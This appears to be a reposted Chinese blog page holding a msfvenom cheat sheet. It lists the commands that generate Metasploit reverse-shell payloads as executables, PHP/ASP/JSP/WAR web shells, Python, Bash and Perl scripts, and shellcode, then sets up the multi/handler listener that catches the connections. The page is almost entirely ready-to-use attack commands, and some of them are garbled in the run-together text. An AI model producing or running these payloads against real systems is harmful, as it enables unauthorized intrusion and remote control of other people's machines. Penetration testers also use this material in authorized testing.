本文共 1487 字,大约阅读时间需要 4 分钟。
msfvenom -l 列出所有模块,攻击载荷Binarieslinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=LPORT= -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMacmsfvenom -p osx/x86ell_reverse_tcp LHOST= LPORT= -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.phpcat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp WARmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.warScripting Payloads Pythonmsfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py Bashmsfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh Perlmsfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.plShellcodeFor all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.Linux Based Shellcodemsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f Windows Based Shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f Mac Based Shellcodemsfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f Handleruse exploit/multi/handler set PAYLOAD set LHOST set LPORT exploit
转载地址:http://dmmen.baihongyu.com/